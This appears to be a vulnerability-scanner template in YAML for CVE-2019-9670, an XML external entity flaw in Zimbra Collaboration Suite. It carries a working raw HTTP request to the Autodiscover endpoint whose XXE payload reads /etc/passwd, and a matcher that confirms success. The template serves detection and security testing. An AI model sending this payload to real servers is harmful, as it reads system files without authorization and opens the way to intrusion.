44 lines
1.5 KiB
YAML
44 lines
1.5 KiB
YAML
id: CVE-2019-9670
|
|
|
|
info:
|
|
name: Zimbra Collaboration XXE
|
|
description: Mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability.
|
|
author: ree4pwn
|
|
severity: critical
|
|
tags: cve,cve2019,zimbra,xxe
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.80
|
|
cve-id: CVE-2019-9670
|
|
cwe-id: CWE-611
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/46693/
|
|
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
|
|
- https://bugzilla.zimbra.com/show_bug.cgi?id=109129
|
|
- http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce
|
|
- http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html
|
|
- https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /Autodiscover/Autodiscover.xml HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/xml
|
|
|
|
<!DOCTYPE xxe [
|
|
<!ELEMENT name ANY >
|
|
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
|
|
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
|
|
<Request>
|
|
<EMailAddress>aaaaa</EMailAddress>
|
|
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
|
|
</Request>
|
|
</Autodiscover>
|
|
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- 'root:.*:0:0'
|
|
part: body
|